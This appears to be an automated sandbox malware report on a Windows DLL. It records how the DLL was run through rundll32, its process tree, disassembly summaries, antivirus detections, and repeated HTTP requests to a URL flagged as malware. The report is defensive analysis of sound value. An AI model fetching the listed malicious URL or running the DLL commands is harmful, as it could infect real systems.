Aug 31, 2024 22:05:17.003803015 CEST	224	IN	Data Raw: 53 38 51 72 53 37 56 72 53 38 58 72 53 37 56 73 53 32 64 73 53 31 58 73 53 38 56 73 53 30 50 72 53 38 5a 72 53 36 50 72 53 35 5e 72 53 33 56 72 53 32 4f 72 53 31 53 72 53 33 50 72 53 30 58 72 53 37 50 72 53 35 5e 72 53 30 59 72 53 33 42 72 53 37 Data Ascii: S8QrS7VrS8XrS7VsS2dsS1XsS8VsS0PrS8ZrS6PrS5^rS3VrS2OrS1SrS3PrS0XrS7PrS5^rS0YrS3BrS7UrS1SrS7PrS5UrS2OrS0^rS0]rS8OrS9\rS8\rS6VrS0VrS0\rS2[rS4BrS5\rS9ZrS7XrS6]rS4VsS5dsS1XsS5VsS4PrS5ZrS1]rS4]rS1[rS1]rS9YrS6YrS2\rS1YrS6SrS8[rS6Tr
Aug 31, 2024 22:05:17.003895044 CEST	1236	IN	Data Raw: 53 30 57 72 53 34 58 72 53 35 4f 72 53 36 51 72 53 32 42 72 53 34 55 72 53 38 53 72 53 34 58 72 53 37 58 72 53 36 5c 72 53 34 56 72 53 36 42 72 53 35 50 72 53 38 59 72 53 31 57 72 53 36 50 72 53 33 5e 72 53 31 5c 72 53 38 42 72 53 39 56 73 53 31 Data Ascii: S0WrS4XrS5OrS6QrS2BrS4UrS8SrS4XrS7XrS6\rS4VrS6BrS5PrS8YrS1WrS6PrS3^rS1\rS8BrS9VsS1dsS5XsS1VsS0PrS4XrS0SrS9XrS3ZrS6QrS9[rS3PrS0PrS3XrS9YrS5TrS8OrS9XrS0[rS5VrS6OrS4SrS1PrS0BrS1\rS2[rS3QrS6QrS6^rS7XrS1ZrS0^rS7WrS9PrS9VrS1VrS1VsS8dsS3XsS9VsS5PrS2W
Aug 31, 2024 22:05:17.003935099 CEST	224	IN	Data Raw: 53 37 58 73 53 31 56 73 53 32 4f 72 53 32 55 72 53 30 51 72 53 36 5a 72 53 36 51 72 53 31 51 72 53 36 5d 72 53 31 55 72 53 36 5a 72 53 34 56 72 53 35 55 72 53 30 5b 72 53 31 5d 72 53 38 59 72 53 30 5b 72 53 31 5c 72 53 36 54 72 53 30 5d 72 53 39 Data Ascii: S7XsS1VsS2OrS2UrS0QrS6ZrS6QrS1QrS6]rS1UrS6ZrS4VrS5UrS0[rS1]rS8YrS0[rS1\rS6TrS0]rS9\rS5TrS2WrS0ZrS4]rS2\rS9QrS7TrS8PrS2XrS8WrS3\rS5SrS2QrS1VsS7dsS9XsS9VsS1OrS0TrS9TrS0PrS5PrS5XrS7QrS4BrS9BrS6BrS4UrS7UrS7OrS7]rS6YrS7PrS2BrS3Ur
Aug 31, 2024 22:05:17.004110098 CEST	1236	IN	Data Raw: 53 31 5e 72 53 30 5b 72 53 33 51 72 53 35 42 72 53 36 57 72 53 33 56 72 53 34 5d 72 53 30 4f 72 53 34 53 72 53 34 58 72 53 35 5b 72 53 35 5c 72 53 38 5d 72 53 38 5a 72 53 33 56 73 53 31 64 73 53 36 58 73 53 32 56 73 53 37 4f 72 53 34 5a 72 53 36 Data Ascii: S1^rS0[rS3QrS5BrS6WrS3VrS4]rS0OrS4SrS4XrS5[rS5\rS8]rS8ZrS3VsS1dsS6XsS2VsS7OrS4ZrS6QrS7OrS3QrS2OrS0OrS4SrS3TrS8YrS5]rS3^rS4ZrS5TrS6BrS3OrS6PrS9TrS6\rS3]rS7YrS7YrS3QrS7WrS5ZrS9UrS6QrS4SrS8OrS0SrS1[rS8\rS7VsS3dsS7XsS0VsS5OrS6ZrS3PrS3OrS7QrS6WrS6O
Aug 31, 2024 22:05:17.004163027 CEST	224	IN	Data Raw: 53 31 55 72 53 39 53 72 53 34 5a 72 53 32 5d 72 53 33 58 72 53 30 56 72 53 38 54 72 53 33 56 72 53 33 5d 72 53 34 5c 72 53 32 55 72 53 38 59 72 53 30 5e 72 53 35 58 72 53 39 55 72 53 34 59 72 53 30 50 72 53 30 58 72 53 34 5c 72 53 31 55 72 53 35 Data Ascii: S1UrS9SrS4ZrS2]rS3XrS0VrS8TrS3VrS3]rS4\rS2UrS8YrS0^rS5XrS9UrS4YrS0PrS0XrS4\rS1UrS5]rS7TrS7VrS3WrS6[rS6XrS0VrS7ZrS9^rS8VsS8dsS8XsS8VsS2OrS8[rS3ZrS1UrS1OrS2\rS9SrS4BrS8ZrS6PrS2BrS6BrS6XrS2BrS6QrS5[rS0WrS6UrS4YrS2^rS9QrS6YrS8Or
Aug 31, 2024 22:05:17.004173994 CEST	1236	IN	Data Raw: 53 32 5a 72 53 38 5a 72 53 33 53 72 53 37 53 72 53 36 53 72 53 34 4f 72 53 33 5d 72 53 35 58 72 53 35 50 72 53 38 56 73 53 36 64 73 53 33 58 73 53 33 56 73 53 38 4f 72 53 39 42 72 53 34 50 72 53 32 53 72 53 33 5a 72 53 35 42 72 53 35 51 72 53 38 Data Ascii: S2ZrS8ZrS3SrS7SrS6SrS4OrS3]rS5XrS5PrS8VsS6dsS3XsS3VsS8OrS9BrS4PrS2SrS3ZrS5BrS5QrS8^rS2TrS7TrS3SrS3]rS6SrS1[rS5OrS6]rS2\rS4YrS4SrS6TrS5ZrS5QrS6^rS8SrS7ZrS7]rS6QrS1UrS4]rS6TrS7TrS2[rS9VsS6dsS5XsS4VsS9VrS9QrS7QrS5\rS2SrS5^rS9BrS3OrS2BrS4WrS1XrS5X
Aug 31, 2024 22:05:17.008757114 CEST	1236	IN	Data Raw: 53 33 51 72 53 35 5d 72 53 31 42 72 53 37 57 72 53 30 5b 72 53 31 53 72 53 38 5d 72 53 33 57 72 53 38 5d 72 53 35 5c 72 53 31 5d 72 53 33 42 72 53 34 54 72 53 35 5a 72 53 36 54 72 53 35 42 72 53 31 50 72 53 36 53 72 53 34 55 72 53 36 56 72 53 31 Data Ascii: S3QrS5]rS1BrS7WrS0[rS1SrS8]rS3WrS8]rS5\rS1]rS3BrS4TrS5ZrS6TrS5BrS1PrS6SrS4UrS6VrS1BrS6]rS4TrS9]rS6VsS8dsS4XsS5VsS5VrS0XrS4ZrS9SrS3YrS8QrS7ZrS1[rS0]rS8XrS7WrS6QrS5PrS1XrS2VrS9[rS3VrS8^rS7UrS5]rS0ZrS6\rS3ZrS6PrS4\rS9PrS8TrS3OrS6[rS1]rS6QrS3]rS0V

Target ID:	1
Start time:	16:05:12
Start date:	31/08/2024
Path:	C:\Windows\System32\loaddll32.exe
Wow64 process (32bit):	true
Commandline:	loaddll32.exe "C:\Users\user\Desktop\HeOkukP.dll"
Imagebase:	0x2c0000
File size:	126'464 bytes
MD5 hash:	51E6071F9CBA48E79F10C84515AAE618
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	16:05:12
Start date:	31/08/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	16:05:12
Start date:	31/08/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /C rundll32.exe "C:\Users\user\Desktop\HeOkukP.dll",#1
Imagebase:	0x410000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	16:05:12
Start date:	31/08/2024
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\HeOkukP.dll,#1
Imagebase:	0x480000
File size:	61'440 bytes
MD5 hash:	889B99C52A60DD49227C5E485A016679
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	16:05:12
Start date:	31/08/2024
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe "C:\Users\user\Desktop\HeOkukP.dll",#1
Imagebase:	0x480000
File size:	61'440 bytes
MD5 hash:	889B99C52A60DD49227C5E485A016679
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	16:05:15
Start date:	31/08/2024
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe "C:\Users\user\Desktop\HeOkukP.dll",#1
Imagebase:	0x480000
File size:	61'440 bytes
MD5 hash:	889B99C52A60DD49227C5E485A016679
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	3.2%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	11.2%
Total number of Nodes:	578
Total number of Limit Nodes:	5

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Non-executed Functions

Function 04C211A4 Relevance: 3.0, APIs: 2, Instructions: 8
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000,?,04C24329,?,?,?,00000001), ref: 04C211A9
UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 04C211B2

Memory Dump Source

Source File: 00000005.00000002.1337569257.0000000004B01000.00000020.00001000.00020000.00000000.sdmp, Offset: 04B00000, based on PE: true

Associated: 00000005.00000002.1337548066.0000000004B00000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.1337670304.0000000004C5A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.1338073948.00000000050CD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.1338097794.00000000050CF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4b00000_rundll32.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: b9d289011fe102815e3a224543025ab0bb5fd1d13a050b73ea5178d849ead2f0
Instruction ID: cd153c15ee159e209089359cff9a0f2f3035d3f94bf2c6b00b759a3efbbfd727
Opcode Fuzzy Hash: b9d289011fe102815e3a224543025ab0bb5fd1d13a050b73ea5178d849ead2f0
Instruction Fuzzy Hash: 09B09232054288ABCA002BD1F80AF9CBF28EB96662F000020F60E44060AFAA9452DA91

Function 04C22C29 Relevance: 1.5, APIs: 1, Instructions: 18COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,?,00000002,?,?,04C236FA,?,?,?,00000002,?,?,?), ref: 04C22C50

Memory Dump Source

Source File: 00000005.00000002.1337569257.0000000004B01000.00000020.00001000.00020000.00000000.sdmp, Offset: 04B00000, based on PE: true

Associated: 00000005.00000002.1337548066.0000000004B00000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.1337670304.0000000004C5A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.1338073948.00000000050CD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.1338097794.00000000050CF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4b00000_rundll32.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: fc44149cc06684d1cbd96dca6b09dd7aad81e68566ec0e58ca7c659674dab770
Instruction ID: 6a4dc0a13bc01d326b5b554b3d9d73a4b2de4c091bfa931ac64bdd11bc15ac73
Opcode Fuzzy Hash: fc44149cc06684d1cbd96dca6b09dd7aad81e68566ec0e58ca7c659674dab770
Instruction Fuzzy Hash: EDD01736000108BF9F019FE0E806C6E3F6AFB49324B084845F91885010DA76A5209B65

Function 04C0387D Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 58
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__CxxThrowException@8.LIBCMT ref: 04C038A5

Part of subcall function 04C1E762: RaiseException.KERNEL32(?,?,04C038AA,?,?,?,?,?,?,?,04C038AA,?,04C58510,?), ref: 04C1E7B7

__CxxThrowException@8.LIBCMT ref: 04C038D3
std::regex_error::regex_error.LIBCPMT ref: 04C038E5
__CxxThrowException@8.LIBCMT ref: 04C038F3
__CxxThrowException@8.LIBCMT ref: 04C03921

Strings

AhxBPOGHKhAzyzIZP, xrefs: 04C03927

Memory Dump Source

Source File: 00000005.00000002.1337569257.0000000004B01000.00000020.00001000.00020000.00000000.sdmp, Offset: 04B00000, based on PE: true

Associated: 00000005.00000002.1337548066.0000000004B00000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.1337670304.0000000004C5A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.1338073948.00000000050CD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.1338097794.00000000050CF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4b00000_rundll32.jbxd

Similarity

API ID: Exception@8Throw$ExceptionRaisestd::regex_error::regex_error
String ID: AhxBPOGHKhAzyzIZP
API String ID: 3461588268-3120880352
Opcode ID: ca61aedb3352fd58176324055722c7893f2802d51637fd0525e6e5843ddd536a
Instruction ID: 877b21ad5fec6d28ec6168a5a7a733e596b47bfacd952060a2238657d62ed536
Opcode Fuzzy Hash: ca61aedb3352fd58176324055722c7893f2802d51637fd0525e6e5843ddd536a
Instruction Fuzzy Hash: DE11EC75C0020CBBAF04EFA4C4598DDBBBDEA14648B408466ED2497650EA34F7499F95

Analysis Process: rundll32.exePID: 7816, Parent PID: 7784COMMON

Execution Graph

Execution Coverage:	0.6%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	570
Total number of Limit Nodes:	2

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Non-executed Functions

Function 04BB387D Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 58
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__CxxThrowException@8.LIBCMT ref: 04BB38A5

Part of subcall function 04BCE762: RaiseException.KERNEL32(?,?,04BB38AA,?,?,?,?,?,?,?,04BB38AA,?,04C08510,?), ref: 04BCE7B7

__CxxThrowException@8.LIBCMT ref: 04BB38D3
std::regex_error::regex_error.LIBCPMT ref: 04BB38E5
__CxxThrowException@8.LIBCMT ref: 04BB38F3
__CxxThrowException@8.LIBCMT ref: 04BB3921

Strings

AhxBPOGHKhAzyzIZP, xrefs: 04BB3927

Memory Dump Source

Source File: 00000007.00000002.1337576998.0000000004AB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04AB0000, based on PE: true

Associated: 00000007.00000002.1337556450.0000000004AB0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.1337681182.0000000004C0A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.1338077429.000000000507D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.1338098193.000000000507F000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4ab0000_rundll32.jbxd

Similarity

API ID: Exception@8Throw$ExceptionRaisestd::regex_error::regex_error
String ID: AhxBPOGHKhAzyzIZP
API String ID: 3461588268-3120880352
Opcode ID: baee3d71151835eed37cf5ff938ef5065579965e76358eb7a1e08f5cc9b7027c
Instruction ID: 42c7606abafa3f38718bf92a9ace29eefedad9f4e65bf3a32e5145fb73672fe4
Opcode Fuzzy Hash: baee3d71151835eed37cf5ff938ef5065579965e76358eb7a1e08f5cc9b7027c
Instruction Fuzzy Hash: A311EC75D4020CBBAF04FFA4C489CDDBBBDAA14248F40C5A6AD6497641EB74F3498F91

Analysis Process: rundll32.exePID: 8024, Parent PID: 7704COMMON

Execution Graph

Execution Coverage:	1.3%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	624
Total number of Limit Nodes:	4

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 05648BC4 Relevance: 3.0, APIs: 2, Instructions: 21
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlFreeHeap.NTDLL(00000000,00000000), ref: 05648BD8

Part of subcall function 05648EDB: __getptd_noexit.LIBCMT ref: 05648EDB

GetLastError.KERNEL32(00000000), ref: 05648BEA

Memory Dump Source

Source File: 00000009.00000002.1369781048.0000000005531000.00000020.00001000.00020000.00000000.sdmp, Offset: 05530000, based on PE: true

Associated: 00000009.00000002.1369766836.0000000005530000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1369863890.000000000568A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1370110589.0000000005AFD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1370128687.0000000005AFF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5530000_rundll32.jbxd

Similarity

API ID: ErrorFreeHeapLast__getptd_noexit
String ID:
API String ID: 269751013-0
Opcode ID: 160e48cf8d35cc82f16f894314be21b2c6df5086fe2ba25d7bdd5a369fdeb11a
Instruction ID: d7ed347e25a427f0ee3236cad9748fec02a5d4ddce777a5b106380e23bb42212
Opcode Fuzzy Hash: 160e48cf8d35cc82f16f894314be21b2c6df5086fe2ba25d7bdd5a369fdeb11a
Instruction Fuzzy Hash: F9E08C71100206ABCB116FE0A80DBAD3BD9BB10245F104028F60AC7150DE348182CB88

Source: http://www.rapidfilestorage.com/clrls/cl_rls.jsonB	Avira URL Cloud: Label: malware
Source: http://www.rapidfilestorage.com/clrls/cl_rls.jsonLz	Avira URL Cloud: Label: malware
Source: http://www.rapidfilestorage.com/clrls/cl_rls.json)	Avira URL Cloud: Label: malware
Source: http://www.rapidfilestorage.com/clrls/cl_rls.json;	Avira URL Cloud: Label: malware
Source: http://www.rapidfilestorage.com/clrls/cl_rls.jsond	Avira URL Cloud: Label: malware
Source: http://www.rapidfilestorage.com/clrls/cl_rls.json	Avira URL Cloud: Label: malware
Source: http://www.rapidfilestorage.com/clrls/cl_rls.jsonu	Avira URL Cloud: Label: malware

Source: HeOkukP.dll	Virustotal: Detection: 40%			Perma Link
Source: HeOkukP.dll	ReversingLabs: Detection: 31%

Source: global traffic	HTTP traffic detected: GET /clrls/cl_rls.json HTTP/1.1Host: www.rapidfilestorage.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /clrls/cl_rls.json HTTP/1.1Host: www.rapidfilestorage.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /clrls/cl_rls.json HTTP/1.1Host: www.rapidfilestorage.comConnection: Keep-AliveCache-Control: no-cache

Source: global traffic	HTTP traffic detected: GET /clrls/cl_rls.json HTTP/1.1Host: www.rapidfilestorage.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /clrls/cl_rls.json HTTP/1.1Host: www.rapidfilestorage.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /clrls/cl_rls.json HTTP/1.1Host: www.rapidfilestorage.comConnection: Keep-AliveCache-Control: no-cache

Source: rundll32.exe, 00000009.00000003.1368971478.000000000339A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.rapidfilestorage.com/clrls/cl_rls.json
Source: rundll32.exe, 00000005.00000003.1336028674.0000000002B3E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1335749105.0000000002B3C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.1336998419.0000000002B3E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.rapidfilestorage.com/clrls/cl_rls.json)
Source: rundll32.exe, 00000009.00000002.1369354017.0000000003340000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000003.1369059378.000000000333A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000003.1368849550.0000000003333000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.rapidfilestorage.com/clrls/cl_rls.json;
Source: rundll32.exe, 00000007.00000003.1336450668.00000000028E9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.1336974130.00000000028EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.1336229595.00000000028E2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.rapidfilestorage.com/clrls/cl_rls.jsonB
Source: rundll32.exe, 00000009.00000003.1368849550.0000000003394000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000002.1369354017.000000000339C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000003.1368526440.000000000339A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000003.1368971478.000000000339A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.rapidfilestorage.com/clrls/cl_rls.jsonLz
Source: rundll32.exe, 00000005.00000003.1336500957.0000000002AC2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.1336963668.0000000002AC3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.rapidfilestorage.com/clrls/cl_rls.jsond
Source: rundll32.exe, 00000005.00000003.1336028674.0000000002B3E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1335749105.0000000002B3C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.1336998419.0000000002B3E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.rapidfilestorage.com/clrls/cl_rls.jsonu
Source: rundll32.exe, 00000005.00000003.1336028674.0000000002B53000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1336201784.0000000002B75000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1336352369.0000000002B53000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.1336229595.0000000002962000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.1337153187.000000000297D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.1336364192.0000000002971000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.1336974130.0000000002962000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.1336389193.0000000002978000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.1336450668.0000000002962000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000003.1368930066.00000000033D6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000003.1368971478.00000000033B3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000002.1369354017.00000000033B3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://aus5.mozilla.org/update/6/%PRODUCT%/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL%/%
Source: rundll32.exe, 00000005.00000003.1336028674.0000000002B53000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1336201784.0000000002B75000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1336352369.0000000002B53000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.1336229595.0000000002962000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.1337153187.000000000297D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.1336364192.0000000002971000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.1336974130.0000000002962000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.1336389193.0000000002978000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.1336450668.0000000002962000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000003.1368930066.00000000033D6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000003.1368971478.00000000033B3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000002.1369354017.00000000033B3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://crash-reports.mozilla.com/submit?id=
Source: rundll32.exe, 00000005.00000003.1336028674.0000000002B53000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1336201784.0000000002B75000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1336352369.0000000002B53000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.1336229595.0000000002962000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.1337153187.000000000297D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.1336364192.0000000002971000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.1336974130.0000000002962000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.1336389193.0000000002978000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.1336450668.0000000002962000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000003.1368930066.00000000033D6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000003.1368971478.00000000033B3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000002.1369354017.00000000033B3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://hg.mozilla.org/releases/mozilla-release

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04C233B0	5_2_04C233B0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_04BD33B0	7_2_04BD33B0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_056533B0	9_2_056533B0

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7724:120:WilError_03
Source: C:\Windows\SysWOW64\rundll32.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\2_PhpuzIakkdPWqpI

Source: unknown	Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\HeOkukP.dll"
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\HeOkukP.dll",#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\HeOkukP.dll,#1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\HeOkukP.dll",#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\HeOkukP.dll",#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\HeOkukP.dll",#1	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\HeOkukP.dll,#1	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\HeOkukP.dll",#1	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\HeOkukP.dll",#1	Jump to behavior

Source: C:\Windows\System32\loaddll32.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04C364F0 push eax; ret	5_2_04C3650E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04C23395 push ecx; ret	5_2_04C233A8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_04BD3395 push ecx; ret	7_2_04BD33A8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_04BE64F0 push eax; ret	7_2_04BE650E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_056664F0 push eax; ret	9_2_0566650E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_05653395 push ecx; ret	9_2_056533A8

Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
